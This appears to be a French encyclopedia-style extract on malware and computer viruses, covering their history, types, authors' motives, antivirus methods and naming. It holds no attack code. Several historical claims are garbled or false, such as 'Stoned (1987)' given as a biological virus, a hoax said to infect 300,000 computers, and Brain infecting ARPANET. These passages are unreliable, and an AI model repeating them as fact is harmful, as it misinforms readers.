Autres menaces D'autres menaces existent. Elles ne sont pas dangereuses en elles-mêmes pour la machine, mais servent à installer des infections ou à réaliser des attaques DNS. Il s'agit des outils de déni de service (DoS et DDoS), des exploits, inondeurs, nukers, du pharming, et des programmes qui servent à créer des logiciels malveillants, en particulier les virtools, les générateurs polymorphes, ou les crypteurs de fichiers. Les publiciels (adware) et les rogues (rançongiciels ou riskwares) ne sont pas non plus directement dommageables pour la machine. Il s'agit de programmes utilisant des techniques de mise en marché (ouverture de fenêtres intempestives, enregistrement automatique dans la barre URL, modification des liens référencés) bien souvent contraires à l'éthique. Certains éléments, qui ne sont pas à l'origine conçus pour être malveillants, sont parfois utilisées à des fins illégales et/ ou compromettantes. Il s'agit notamment des composeurs, téléchargeurs, enregistreurs de frappes, serveurs FTP, mandataires (proxy), Telnet et Web, clients IRC, canulars, utilitaires de récupération de mots de passe, outils d'administration à distance, décortiqueurs et moniteurs.

Environnement de prédilection Les programmes malveillants ont été développés pour de nombreux systèmes d'exploitation et applications. Pourtant, certains d'entre eux n'ont jamais été concernés. En effet, les auteurs de virus privilégient les systèmes d'exploitation largement utilisés ; les systèmes comportant des vulnérabilités ; et ceux pour lesquels une documentation détaillée est disponible (puisqu'elle inclut des descriptions des services et des règles en vigueur pour écrire des programmes compatibles). Le volume de logiciels malveillants destinés à Windows et Linux est à peu près proportionnel à leurs parts de marché respectives.

Historique La démocratisation massive de l'utilisation des ordinateurs fut accompagnée d'une explosion du nombre de virus. Ces derniers ont ensuite évolué parallèlement aux technologies. Dans les années 1980, ils visaient un ensemble de systèmes d'exploitation et de réseaux ; dans les années 1990, ils servaient surtout à dérober des informations confidentielles comme celles relatives aux comptes bancaires ou les mots de passe ; de nos jours, la majorité des virus exploitent les failles de Windows, le système d'exploitation le plus répandu à travers le monde.

Années 1940 - 1960 : La reproduction automatisée Selon certains spécialistes, le concept de virus informatique trouve son origine dans les travaux de John von Neumann au sujet des automates mathématiques à reproduction automatique, célèbres dans les années 1940, et en 1951, il avait exposé plusieurs méthodes pour les créer. En 1959, Lionel Penrose, un mathématicien britannique, avait présenté ses propres théories sur le sujet, dans un article intitulé « Self-reproducing Machines », publié dans le Scientific American. À la différence de Neumann, il décrit un modèle simple à deux dimensions pour cette structure qui peut être activée, se multiplier, muter et attaquer. Peu après la publication de l'article de Penrose, Frederick G. Stathl reproduit ce modèle en code machine sur un IBM 650. À cette époque, ces travaux n'étaient pas destinées à développer des virus informatiques. Elles ont ensuite servi de fondations à de nombreuses études réalisées plus tard sur la robotique et l'intelligence artificielle. En 1962, un groupe d'ingénieurs des laboratoires Bell Telephone (composé de V. Vyssotsky, G. McIlroy et Robert Morris) créèrent un jeu — baptisé « Darwin » — qui consistait à suivre et détruire les programmes des concurrents, Logiciel malveillant 116

chacun des adversaires étant capable de se multiplier. Ce jeu est bâti autour d'un « arbitre » dans la mémoire de l'ordinateur qui définit les règles et l'ordre de bataille entre les programmes concurrents créés par les joueurs. Le jeu consiste à supprimer les programmes des concurrents et à contrôler le champ de bataille.

Années 1970 : Les réseaux dédiés Les premiers virus sont apparus dès les années 1970, notamment Creeper, sur des réseaux dédiés comme ARPANET (un réseau informatique de l'armée américaine, prédécesseur d'Internet). Ce virus était capable d'accéder à un système distant via un modem et de s'y insérer, affichant alors un message d'avertissement à l'utilisateur infecté : « I'M THE CREEPER : CATCH ME IF YOU CAN ». Peu après, le programme Reaper a été créé par des auteurs anonymes, avec pour but d'éliminer Creeper lorsqu'il le détectait. Il s'agissait en fait d'un autre virus, capable de se propager sur les machines mises en réseaux. En 1975, Pervading Animal, un autre jeu développé pour un Univac 1108 est apparu. Actuellement, les experts n'ont pas encore défini s'il s'agissait d'un virus ou du premier cheval de Troie.

Années 1980 : Premières épidémies Dans les années 1980, les virus sont apparus en nombre et les premiers chevaux de Troie ont été développés. Ces derniers n'étaient pas capables de se reproduire ni de se propager, mais une fois téléchargés et installés, ils endommageaient les systèmes. L'utilisation répandue des ordinateurs Apple II a suscité l'intérêt des auteurs de virus : la première épidémie de virus informatiques (notamment Elk Cloner via les disquettes de démarrage) à grande échelle a alors touché cette plate-forme. En 1986, la première épidémie de virus informatique compatible avec IBM a été découverte. Il s'agissait de Brain, un virus furtif (en cas de tentative de lecture du secteur infecté, il affichait les données originales saines), capable d'infecter le secteur d'amorçage, mais dépourvu de charge utile, et donc inoffensif[3]. Suite à une perte de contrôle de ses auteurs, le virus se propagea à travers le monde en seulement quelques mois. C'est cette même année que Ralf Burger, un programmeur allemand, inventa les premiers programmes capables de se copier, en ajoutant leurs fichiers DOS exécutables au format COM. En 1987, le célèbre virus Lehigh — qui tire son nom de l'université de Pennsylvanie éponyme qui l'a découvert — était le premier à endommager directement les données. En effet, il lançait une routine destructrice qui, au final, supprimait toutes les données de valeur avant de s'auto-détruire. Il fut particulièrement étudié au sein de l'université de Lehigh et ne connut pas d'expansion à travers le monde. À cette époque, les utilisateurs commencèrent à considérer sérieusement les questions de sécurité informatique. Le premier forum électronique consacré à la sécurité contre les virus fut ouvert le 22 avril 1988 : il s'agit du forum Virus-L sur le réseau Usenet, créé par Ken Van Wyk. Cette même année, le premier canular fit son apparition. Cela consistait à répandre des rumeurs au sujet de nouveaux virus dangereux. Ce type de pratique, n'est pas dangereuse pour l'ordinateur lui-même (les canulars utilisent seulement de la bande passante), mais discrédite les utilisateurs qui y croient. Cette même année, Robert Morris lança un autre canular — qui traitait d'un prétendu virus capable de se propager sur les réseaux et de modifier les configurations du port et du lecteur — qui avait alors infecté 300 000 ordinateurs en moins de 12 minutes dans les deux États du Dakota. En novembre 1988, le ver Morris fut découvert, infectant plus de 600 systèmes informatiques aux États-Unis, y compris celui du centre de recherche de la NASA. Il exploitait une vulnérabilité d'UNIX sur les plates-formes VAX et Sun Microsystems, et utilisait plusieurs méthodes innovantes (comme la collecte des mots de passe) pour accéder aux systèmes ; Ce ver était capable de se multiplier et envoyait un grand nombre de copies de lui-même, saturant ainsi complètement les réseaux. Les pertes globales r engendrées par ce ver furent estimées à 96 millions de dollars américains. En 1988, l'antivirus nommé D . Solomon's Anti-Virus Toolkit (créé par Alan Solomon, un programmeur anglais) a vu le jour (sa société a ensuite été rachetée par l'entreprise américaine Network Associates devenue ensuite McAfee, Inc ; et en 1989, plusieurs autres antivirus, dont –V (développé par E. Kaspersky), F-Prot, ThunderBYTE, Norman Virus Control et Virscan for MS-DOS (créé Logiciel malveillant 117

par IBM) ont été mis au point.

Années 1990 : Le polymorphisme En 1990, les auteurs de virus ont développé de nouvelles caractéristiques, notamment les virus polymorphes comme ceux de la famille Chameleon (basée sur d'autres virus célèbres comme Vienna et Cascade) ; Leurs codes étaient non seulement cryptés, mais aussi automatiquement modifiés à chaque infection. Cette particularité les protégeait des antivirus de l'époque, alors basés sur la recherche contextuelle classique pour détecter des éléments de codes de virus connus. Peu après, les experts de la lutte contre les virus ont mis au point des algorithmes spéciaux capables d'identifier ce nouveau type de virus. Cette année marque également l'apparition de virus d'origine bulgare, comme Murphy, Nomenclatura, Beast ; et russe, avec Eterburg, Voronezh, LoveChild, etc. L'inauguration de l'EICAR (Centre européen de recherche contre les virus informatiques) à également eut lieu cette année à Hambourg. Elle regroupait des professionnels faisant partie des sociétés éditrices d'antivirus, et est considérée depuis comme l'une des organisations internationales les plus respectées. En 1991, 300 exemplaires de virus étaient recensés. Au début de cette année, de nouveaux logiciels antivirus, notamment Norton Antivirus, Central Point Antivirus et Untouchable (ces deux derniers ont ensuite été rachetés par Symantec) ont été développés. En 1992, le nombre de virus — principalement ceux s'attaquant au secteur d'amorçage — a explosé. Ils visaient alors le système d'exploitation le plus répandu, MS-DOS, sur les plates-formes les plus utilisées, en particulier l'IBM-PC. De nouveaux logiciels antivirus ainsi que des livres et des magazines consacrés aux virus informatiques ont alors été publiés. Cette même année, les autorités judiciaires du monde entier ont instauré des départements exclusivement consacrés à la lutte contre la cybercriminalité (par exemple, la brigade de criminalité informatique de New Scotland Yard). Le premier virus pour le système d'exploitation Windows, dénommé Win.Vir_1_4, est apparu ; il infectait les fichiers exécutables du système d'exploitation. En 1993, de nouveaux virus dotés de nouvelles techniques d'infection, de pénétration des systèmes, de destruction des données et de dissimulation vis-à-vis des logiciels antivirus ont été développés (par exemple, PMBS et Strange). Cette même année, Microsoft lança son propre logiciel antivirus, nommé Microsoft AntiVirus (MSAV). Il était basé sur l'ancien Central Point AntiVirus (CPAV), et était inclus dans les versions standard de MS-DOS et de Windows. Malgré l'efficacité démontrée, le projet fini par être abandonné par la suite. En 1994, les cédéroms faisaient partie des principaux vecteurs de propagation des virus ; le marché informatique a ainsi été inondé par une dizaine de milliers de disques infectés, et comme la désinfection était impossible, ils devaient alors être détruits. En 1995, l’émergence des virus de macro (notamment dans MS Word et d'autres applications MS Office) a posé de nouveaux défis aux éditeurs de logiciels antivirus, alors amenés à développer de nouvelles technologies pour les détecter. L'année 1996 marque le début des hostilités lancées par la communauté informatique clandestine contre les systèmes d'exploitation Windows 95 (par exemple le virus Boza) et Windows NT, ainsi que contre d'autres applications comme Microsoft Office. Le premier virus Windows détecté dans la nature était Win.Tentacle. En effet, ces virus étaient jusqu'alors principalement contenus dans des collections ou des journaux électroniques destinés aux auteurs de virus. Le premier virus pour Linux, dénommé Linux Bliss, est apparu en février 1997 ; les virus et chevaux de Troie visant ce système d'exploitation sont toutefois restés rares, vu sa faible popularité face à Microsoft Windows. Cette même année, le virus de macro ShareFune pour MS Word (versions 6 et 7) était le premier de son genre à se propager par courrier électronique (notamment via le client MS Mail). Le développement d'Internet et particulièrement celui de mIRC (Internet Relay Chat) ont été inévitablement accompagnés de celui des virus et des vers. 1997 est également l'année des scandales et des mesquineries entre plusieurs sociétés éditrices d'antivirus (notamment McAfee et Dr. Solomon's / Trend Micro contre McAfee et Symantec), au sujet de « tricheries » et de brevets. Le premier module Logiciel malveillant 118

exécutable malicieux Java, Java.StrangeBrew, est apparu en août. Le 26 mars 1999, Melissa, le premier virus de macro MS Word avec fonction de ver Internet, a déclenché une épidémie mondiale. Une fois l'infection installée, ce virus balayait le carnet d'adresses de MS Outlook et envoyait sa propre copie aux 50 premières qu'il trouvait. Comme Happy99, Melissa agissait à l'insu de l'utilisateur mais les messages semblaient venir de l'utilisateur lui-même. Ce virus a forcé plusieurs sociétés comme Microsoft, Intel et Lockheed Martin à fermer momentanément leur système de messagerie. Les dégâts causés par ce virus sont estimés à plusieurs dizaines de millions de dollars américains. En novembre, une nouvelle génération de vers (Bubbleboy et KaKWorm), est apparue. Ils exploitaient une faille d'Internet Explorer, et se propageaient par courrier électronique sans pièce jointe, infectant l'ordinateur dès que le message était lu. Vers le milieu de l'année 1999, le secteur antivirus s'est officiellement divisé en deux parties quant à l'attitude à adopter face au bogue de l'an 2000. La première était convaincue que la communauté informatique clandestine enverrait des centaines de milliers de virus capables de faire « le monde s'écrouler », et incitant donc largement les utilisateurs à installer un logiciel antivirus. La seconde partie tentait de maintenir le calme des utilisateurs paniqués. Aucun bogue apocalyptique n'a finalement eu lieu.

Années 2000 : Une expansion insatiable Le 6 juin, Timofonica est détecté comme le premier « virus » (qualifié ainsi par les journalistes) à utiliser — d'une manière réduite — les téléphones mobiles. En plus de la propagation par courrier électronique, ce virus était capable d'envoyer des messages vers des numéros aléatoires appartenant au réseau Movistar de Telefonica, le géant mondial des télécommunications. Il n'avait aucun effet dommageable sur les téléphones mobiles. Le virus Liberty a été découvert en août 2000. Il s'agit du premier cheval de Troie nuisible à viser le système d'exploitation Palm OS du Palm Pilot. Ce programme malveillant supprimait les fichiers mais n'était pas capable de se reproduire. Phage a ensuite été le premier véritable virus dit « classique » pour PalmOS. En 2000, le courrier électronique était considéré (en particulier par Kaspersky Lab) comme le principal vecteur de propagation des virus. Cette année, 37 nouveaux virus et chevaux de Troie ont été créés pour le système d'exploitation Linux, multipliant ainsi la quantité globale de virus lui étant destiné par sept. Jusqu'alors, les virus de macro étaient les plus répandus, avant d'être détrônés par les virus de script. En 2001, le nombre d'attaques de virus et de vers (apparition des vers sans fichiers, existant uniquement dans la mémoire RAM) a continué d'augmenter, malgré les ripostes parallèles des éditeurs de logiciels antivirus. Les infections utilisaient surtout les vulnérabilités, le courrier électronique et Internet. Une nouvelle technique d'infection est apparue : il n'est plus nécessaire de télécharger des fichiers, une simple visite sur le site infecté suffit. La majorité des utilisateurs ont été infectés par des programmes malveillants qui exploitaient les vulnérabilité d'Internet Explorer. L'utilisation d'autres vecteurs comme ICQ, IRC, MSN Messenger et les réseaux de partage de fichiers pour la propagation de programmes malveillants a également commencé à se développer. En 2001, les vers pour Windows constituaient la majorité des nouvelles menaces. L'ampleur des épidémies provoquées par CodeRed, Nimda, Aliz, BadtransII, ILoveYou, Magistr et SirCam a changé le monde de la sécurité informatique, et dicté la tendance pour l'évolution des programmes malveillants dans les années à venir. 2001 marque également l'augmentation des attaques sur Linux (par exemple Ramen, qui a infecté entre autres la NASA) ; la majorité de ces codes malicieux exploitent des vulnérabilités du système d'exploitation. La multiplication de ces menaces a montré le manque total de préparation des développeurs Linux, convaincus jusqu'alors que ce système d'exploitation était sûr. En 2002, les virus de script et d'autres virus classiques ont quasiment disparu. En 2003, deux attaques mondiales sur Internet ont été déclenchées : Lovesan et le ver Slammer. Ce dernier, qui exploitait une vulnérabilité des serveurs MS SQL pour se propager, a infecté plusieurs centaines de milliers d'ordinateurs dans le monde en quelques minutes seulement. Cette année, un nouveau type de chevaux de Troie est apparu, les chevaux de Troie proxy. À l'automne de cette année, les chevaux de Troie avaient dépassé les virus en nombre, et cette tendance tendait à continuer. En 2003, environ 10 virus de fichiers toujours actifs étaient Logiciel malveillant 119

dénombrés. Le crash du vol 5022 Spanair d'août 2008 pourrait être dû, en plus d'une erreur de pilotage, à un logiciel malveillant de type cheval de Troie, qui aurait empêché le système d'alerte de fonctionner[4]. Depuis les années 2000, 3 milliards de codes malveillants attaquent chaque année les ordinateurs dans le monde entier[5].

Auteurs de malwares et motivations Tous les groupes d'auteurs de malwares représentent un danger pour la sécurité informatique. Les programmes malveillants sont majoritairement développés par des auteurs professionnels.

Auteurs

Le cyber vandalisme Aux débuts du malware, certains, peu dangereux et peu répandus, étaient écrits par des programmeurs qui voulaient tester leurs propres capacités. D'autres, assez peu évolués, l'ont été par des étudiants en programmation informatique. Avec le développement d'Internet, des sites et des forums spécialisés, de nouvelles perspectives se sont ouvertes.

Les professionnels Certains anciens script kiddies ont continué à œuvrer dans le milieu de l'informatique underground. Ils forment désormais un réseau de professionnels très secret, auteurs d'épidémies particulièrement virulentes.

Les pseudo-scientifiques Les auteurs de POC (Proof of Concept) se définissent eux-mêmes comme des chercheurs, dont la motivation ne serait pas pécuniaire, mais scientifique. Ils forment un petit groupe qui se consacre au développement de nouvelles méthodes de pénétration et d'infection des systèmes d'exploitation, cela sans être détectés par les logiciels antivirus. Ils ne dévoilent généralement pas le code source de leurs malwares, mais discutent de leurs trouvailles sur des sites spécialisés.

L'appât du gain La principale motivation est sans conteste financière. En 1997, les premiers chevaux de Troie ont été développés avec pour but de récolter les mots de passe d'AOL (puis d'autres FAI), pour que leurs auteurs puissent accéder gratuitement à Internet. De nos jours, il s'agit de trouver et/ou de créer des clefs de licence (voir keygen) pour les logiciels payants, les auteurs de ce type de fraudes prônant le libre-partage des informations. Le cyber crime est également très répandu, pratiqué par des fraudeurs particuliers ou professionnels. Ils extirpent directement de l'argent aux utilisateurs via des rançongiciels ou des rogues ; créent puis vendent des réseaux de bots destinés à l'envoi massif de spam (ils sont ainsi rémunérés) ou aux attaques de DOS suivies de chantage (ces attaques visent surtout les boutiques en lignes, les sites bancaires et de jeux en ligne). Les chevaux de Troie espions sont utilisés afin de dérober de l'argent des comptes bancaires et paypal. Les auteurs de malwares et les hackers sont également rémunérés à développer et entretenir des moyens pour rediriger les navigateurs vers des sites web payants, ou contenant des programmes malveillants, en particulier grâce aux adwares et aux composeurs. Logiciel malveillant 120

Notes et références • Cet article est principalement issu de l'article de viruslist.com [6] [3] Brain a été fabriqué par deux frères pakistanais, Basit et Amjad. Source: DEFCON 19 : The history and the evolution of computer viruses

(http:/ / www. youtube. com/ embed/ s2g9lgYrYJM), par Mikko Hypponen. Détail à 03:48.

[4] (http:/ / www. msnbc. msn. com/ id/ 38790670/ ns/ technology_and_science-security/ )

[6] http:/ / www. viruslist. com/ fr/ viruses/ encyclopedia?chapter=161594717

Virus informatique

Pour l’article homonyme, voir Le Virus informatique pour le magazine. Un virus informatique est un automate auto réplicatif à la base non malveillant, mais aujourd'hui trop souvent additionné de code malveillant (donc classifié comme logiciel malveillant), conçu pour se propager à d'autres ordinateurs en s'insérant dans des logiciels légitimes, appelés « hôtes ». Il peut perturber plus ou moins gravement le fonctionnement de l'ordinateur infecté. Il peut se répandre à travers tout moyen d'échange de données numériques comme les réseaux informatiques et les cédéroms, les clefs USB, etc.

Son appellation provient d'une analogie avec le virus biologique Stoned (1987) puisqu'il présente des similitudes dans sa manière de se propager en utilisant les facultés de reproduction de la cellule hôte. On attribue le terme de « virus informatique » à l'informaticien et spécialiste en biologie moléculaire Leonard Adleman (Fred Cohen, Experiments with Computer Viruses, 1984).

Les virus informatiques ne doivent pas être confondus avec les vers informatiques, qui sont des programmes capables de se propager et de se dupliquer par leurs propres moyens sans contaminer de programme hôte. Au sens large, on utilise souvent et abusivement le mot virus pour désigner toute forme de logiciel malveillant. Stoned Code Le nombre total de programmes malveillants connus serait de l'ordre de 95 000 (2011) selon Sophos (tous types de malwares confondus)[1]. Cependant, le nombre de virus réellement en circulation ne serait pas supérieur à quelques milliers selon la Wildlist Organisation[2], chaque éditeur d'antivirus ayant intérêt à « gonfler » (surestimer) le nombre de virus qu'il détecte. La très grande majorité touche la plate-forme Windows. Bien qu'ils soient extrêmement peu nombreux, il existe aussi des virus sur les systèmes d'exploitation de type Unix/Linux[3], mais aucune épidémie comparable à celle des virus Windows n'a encore été constatée à cette date (2011). Le reste est essentiellement destiné à des systèmes d'exploitation qui ne sont plus distribués depuis quelques années, comme les 27 virus — aucun n'étant dangereux — frappant Mac OS 9 et ses prédécesseurs (recensés par John Norstad, auteur de l'antivirus Disinfectant). Les systèmes les moins touchés sont FreeBSD qui axe son développement sur la sécurité, ainsi que Novell NetWare et OS/2 trop rares pour apporter une notoriété à un développeur de virus.

Les virus font souvent l'objet de fausses alertes que la rumeur propage, encombrant les messageries. Certaines d'entre elles, jouant sur l'ignorance en informatique des utilisateurs, leur font parfois détruire des éléments totalement sains du système d'exploitation. Virus informatique 121

Historique Les premiers logiciels autonomes n'avaient pas le but qu'ils ont aujourd'hui. Les tout premiers logiciels de ce type étaient de simples divertissements, un jeu entre trois informaticiens de la société Bell, Core War, créé en 1970 dans les laboratoires de la société. Pour ce jeu, chaque joueur écrit un programme, ensuite chargé en mémoire vive. Le système d'exploitation, qui se doit juste d'être multitâche, exécute tour à tour une instruction de chacun des logiciels. L'objectif du jeu est de détruire les programmes adverses tout en assurant sa propre prolifération. Les joueurs ne connaissent évidemment pas l'emplacement du programme adverse. Les logiciels sont capables de se recopier, de se réparer, de se déplacer eux-mêmes en différentes zones de la mémoire et « d'attaquer » le logiciel adverse en écrivant aléatoirement dans d'autres zones mémoire. La partie se termine au bout d'un temps défini ou lorsque l'un des joueurs voit tous ses programmes inactifs ou détruits. Le vainqueur est celui qui possède le plus grand nombre de copies actives. C'est exactement un des principes de programmation des virus. En 1984, le magazine Scientific American a présenté un jeu informatique consistant à concevoir de petits programmes entrant en lutte et s'autoreproduisant en essayant d'infliger des dégâts aux adversaires, fondant ainsi les bases des futurs virus. En 1986, l'ARPANET fut infecté par Brain, virus renommant toutes les disquettes de démarrage de système en (C)Brain. Les créateurs de ce virus y donnaient leur nom, adresse et numéro de téléphone car c'était une publicité pour eux.

Différents types de virus • Le virus classique est un morceau de programme, souvent écrit en assembleur, qui s'intègre dans un programme normal, le plus souvent à la fin, mais cela peut varier. Chaque fois que l'utilisateur exécute ce programme « infecté », il active le virus qui en profite pour aller s'intégrer dans d'autres programmes exécutables. De plus, lorsqu'il contient une charge utile, il peut, après un certain temps (qui peut être très long) ou un évènement particulier, exécuter une action prédéterminée. Cette action peut aller d'un simple message anodin à la détérioration de certaines fonctions du système d'exploitation ou la détérioration de certains fichiers ou même la destruction complète de toutes les données de l'ordinateur. On parle dans ce cas de « bombe logique » et de « charge utile ». • Un virus de boot s'installe dans un des secteurs de boot d'un périphérique de démarrage, disque dur (le secteur de boot principal, le « Master boot record », ou celui d'une partition), disquette, ou autre. Il remplace un chargeur d'amorçage (ou programme de démarrage ou « bootloader ») existant (en copiant l'original ailleurs) ou en créé un (sur un disque ou il n'y en avait pas) mais ne modifie pas un programme comme un virus normal ; quand il remplace un programme de démarrage existant, il agit un peu comme un virus « prepender » (qui s'insère au début), mais le fait d'infecter aussi un périphérique vierge de tout logiciel de démarrage le distingue du virus classique, qui ne s'attaque jamais à « rien ». • Les macrovirus qui s'attaquent aux macros de logiciels de la suite Microsoft Office (Word, Excel, etc.) grâce au VBA de Microsoft. Par exemple, en s'intégrant dans le modèle normal.dot de Word, un virus peut être activé à chaque fois que l'utilisateur lance ce programme. • Les virus-vers, apparus aux environs de l'année 2003, ayant connu un développement fulgurant dans les années qui suivirent, sont des virus classiques car ils ont un programme hôte. Mais s'apparentent aux vers (en anglais « worm ») car : • Leur mode de propagation est lié au réseau, comme des vers, en général via l'exploitation de failles de sécurité. • Comme des vers, leur action se veut discrète, et non-destructrice pour les utilisateurs de la machine infectée. • Comme des vers, ils poursuivent des buts à visée large, tels que l'attaque par saturation des ressources ou attaque DoS (Denial of Service) d'un serveur par des milliers de machines infectées se connectant simultanément[réf. nécessaire]. Virus informatique 122

• Les virus de type batch, apparu à l'époque où MS-DOS était le système d'exploitation en vogue, sont des virus « primitifs ». Bien que capables de se reproduire et d'infecter d'autres fichiers batch, ils sont lents et ont un pouvoir infectant très faible. Certains programmeurs ont été jusqu'à créer des virus batch cryptés et polymorphes, ce qui peut être qualifié de « prouesse technique » tant le langage batch est simple et primitif. D'autres menaces existent en informatique, s'en distinguant souvent par l'absence de système de reproduction qui caractérise les virus et les vers ; le terme de « logiciel malveillant » (« malware » en anglais) est dans ce cas plus approprié.

Caractéristiques • le chiffrement : à chaque réplication, le virus est chiffré (afin de dissimuler les instructions qui, si elles s'y trouvaient en clair, révéleraient la présence de ce virus ou pourraient indiquer la présence de code suspect). • le polymorphisme : le virus est chiffré et la routine de déchiffrement est capable de changer certaines de ses instructions au fil des réplications afin de rendre plus difficile la détection par l'antivirus. • le métamorphisme : contrairement au chiffrement simple et au polymorphisme, où le corps du virus ne change pas et est simplement chiffré, le métamorphisme permet au virus de modifier sa structure même et les instructions qui le composent. • la furtivité : le virus « trompe » le système d'exploitation (et par conséquent les logiciels antivirus) sur l'état des fichiers infectés. Des rootkits permettent de créer de tels virus. Par exemple, l'exploitation d'une faille de sécurité au niveau des répertoires permet de masquer l'existence de certains fichiers exécutables ainsi que les processus qui leur sont associés.

Logiciels antivirus Les logiciels antivirus sont des logiciels capables de détecter des virus, détruire, mettre en quarantaine et parfois de réparer les fichiers infectés sans les endommager. Ils utilisent pour cela de nombreuses techniques, parmi lesquelles : •• la reconnaissance de séquences d'octets caractéristiques (signatures) d'un virus particulier ; •• la détection d'instructions suspectes dans le code d'un programme (analyse heuristique); •• la création de listes de renseignements sur tous les fichiers du système, en vue de détecter d'éventuelles modifications ultérieures de ces fichiers par un virus ; •• la détection d'ordres suspects ; • la surveillance des lecteurs de support amovible : disquettes, Zip, CD-ROM, DVD-ROM, Clé USB

Virologie Le terme virus informatique a été créé par analogie avec le virus en biologie : un virus informatique utilise son hôte (l'ordinateur qu'il infecte) pour se reproduire et se transmettre à d'autres ordinateurs. Comme pour les virus biologiques, pour lesquels ce sont les hôtes les plus en contact avec d'autres hôtes qui augmentent les chances de développement d'un virus, en informatique ce sont les systèmes et logiciels les plus répandus qui sont les plus atteints par les virus : Microsoft Windows, Microsoft Office, Microsoft Outlook, Microsoft Internet Explorer, Microsoft Internet Information Server... Les versions professionnelles de Windows (NT/2000/XP pro) permettant de gérer les droits de manière professionnelle ne sont pas immunisées contre ces envahisseurs furtifs. La banalisation de l'accès à Internet a été un facteur majeur dans la rapidité de propagation à grande échelle des virus les plus récents. Ceci est notamment dû à la faculté des virus de s'approprier des adresses de courriel présentes sur la machine infectée (dans le carnet d'adresses mais aussi dans les messages reçus ou dans les archives de pages web visitées ou de messages de groupes de discussions). Virus informatique 123

De même, l'interconnexion des ordinateurs en réseaux locaux a amplifié la faculté de propagation des virus qui trouvent de cette manière plus de cibles potentielles. Cependant, des systèmes à diffusion plus restreinte ne sont pas touchés proportionnellement. La majorité de ces systèmes, en tant que variantes de l'architecture UNIX (BSD, Mac OS X ou Linux), utilisent en standard une gestion des droits de chaque utilisateur leur permettant d'éviter les attaques les plus simples, les dégâts sont donc normalement circonscrits à des zones accessibles au seul utilisateur, épargnant la base du système d'exploitation.

Dénomination des virus Lors de leur découverte, les virus se voient attribuer un nom. Celui-ci est en théorie conforme à la convention signée en 1991 par les membres de CARO (en:Computer Antivirus Research Organization). Ce nom se détermine ainsi : • en préfixe, le mode d'infection (ex: macro virus, cheval de Troie, ver...) ou le système d'exploitation concerné (ex: Win32) ; • un mot exprimant une de ses particularités ou la faille qu'il exploite (Swen est l'anagramme de News, Nimda l'anagramme de Admin, Sasser exploite une faille LSASS, ...) ; • en suffixe un numéro de version (les virus sont souvent déclinés sous forme de variantes comportant des similitudes avec la version d'origine).

Exceptions Malheureusement, les laboratoires d'analyse des différents éditeurs antiviraux affectent parfois leur propre appellation aux virus sur lesquels ils travaillent, ce qui rend difficile la recherche d'informations. C'est ainsi que, par exemple, le virus NetSky dans sa variante Q est appelé W32.Netsky.Q@mm chez Symantec, WORM_NETSKY.Q chez Trend Micro, W32/Netsky.Q.worm chez Panda Security et I-Worm.NetSky.r chez Kaspersky. Il est cependant possible d'effectuer des recherches génériques pour un nom donné grâce à des moteurs de recherche spécialisés, comme celui de en:Virus Bulletin ou de Kevin Spicer.

Virus sur les systèmes Linux

Cet article ne cite pas suffisamment ses sources. Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [4] )

Article détaillé : Liste des malwares Linux. Le système d'exploitation Linux, au même titre que les systèmes d'exploitation Unix et apparentés, est généralement assez bien protégé contre les virus informatiques. Cependant, certains virus peuvent potentiellement endommager des systèmes Linux non sécurisés. Comme les autres systèmes Unix, Linux implémente un environnement multi-utilisateur, dans lequel les utilisateurs possèdent des droits spécifiques correspondant à leur besoin. Il existe ainsi un système de contrôle d'accès visant à interdire à un utilisateur de lire ou de modifier un fichier. Ainsi, les virus ont typiquement moins de capacités à altérer et à infecter un système fonctionnant sous Linux que sous DOS ou encore les Windows ayant toujours des systèmes de fichiers en FAT32 (le système de fichier NTFS a le même type de protection que les fichiers UNIX, les Windows à base NT isolent également les comptes entre eux). C'est pourquoi, aucun des virus écrits pour Linux, y compris ceux cités ci-dessous, n'a pu se propager avec succès. En outre, les failles de sécurité qui sont exploitées par Virus informatique 124

les virus sont corrigées en quelques jours par les mises à jour du noyau Linux et des logiciels composant le système. Des scanners de virus sont disponibles pour des systèmes Linux afin de surveiller l'activité des virus actifs sur Windows. Ils sont principalement utilisés sur des serveurs mandataires ou des serveurs de courrier électronique, qui ont pour client des systèmes Microsoft Windows.

Virus informatiques célèbres Cabir est considéré comme le tout premier virus informatique proof of concept recensé se propageant par la téléphonie mobile grâce à la technologie Bluetooth et du système d'exploitation Symbian OS. MyDoom.A est un virus informatique qui se propage par les courriels et le service P2P de Kazaa. Les premières infections ont eu lieu le 26 janvier 2004. Psyb0t est un virus informatique découvert en janvier 2009. Il est considéré comme étant le seul virus informatique ayant la capacité d'infecter les routeurs et modem haut-débit. Le virus Tchernobyl ou CIH est connu pour avoir été un des plus destructeurs. Il détruisait l'ensemble des informations du système attaqué et parfois il rendait la machine quasiment inutilisable. Il a sévi de 1998 à 2002. Le ver Conficker exploite une faille du Windows Server Service utilisé par Windows 2000, Windows XP, Windows Vista, Windows 7, Windows Server 2003 et Windows Server 2008.

Virus et téléphonie mobile Le premier virus ciblant la téléphonie mobile est né en 2004 : il s'agit de Cabir se diffusant par l'intermédiaire des connexions Bluetooth. Il sera suivi d'un certain nombre dont le CommWarrior en 2005. Ces virus attaquent essentiellement le système d'exploitation le plus répandu en téléphonie mobile, Symbian OS, surtout dominant en Europe[5].

Bibliographie • Mark Allen Ludwig (traduction de Jean-Bernard Condat), Naissance d'un virus : Technologie et principes fondamentaux, Diff. Bordas, 1993, 47 p. (ISBN B0006PCHY6) • Mark Allen Ludwig (traduction de Jean-Bernard Condat), Mutation d'un virus : vie artificielle et évolution, Addison-Wesley France, 1996, 372 p. (ISBN 9782879080864) • Mark Allen Ludwig, Du virus à l'antivirus : guide d'analyse, Dunod, 1997, 720 p. (ISBN 9782100034673) • Éric Filiol, Les Virus informatiques : théorie, pratique et applications, 2009, 575 p. (ISBN 9782287981999) • (en) Peter Szor, The Art of Computer Virus Research and Defense, Addison-Wesley Professional, 2005, 744 p. (ISBN 9780321304544) • François Paget, Vers & Virus - Classification, lutte anti-virale et perspectives, DUNOD, 2005 (ISBN 2-10-008311-2) Virus informatique 125

Notes et références

[1] The Security Threat Report: The Threats to Watch 2011 (http:/ / www. sophos. com/ fr-fr/ about-us/ webinars/

security-threat-report-threats-to-watch. aspx)

[2] Wildlist Organisation (http:/ / www. wildlist. org/ )

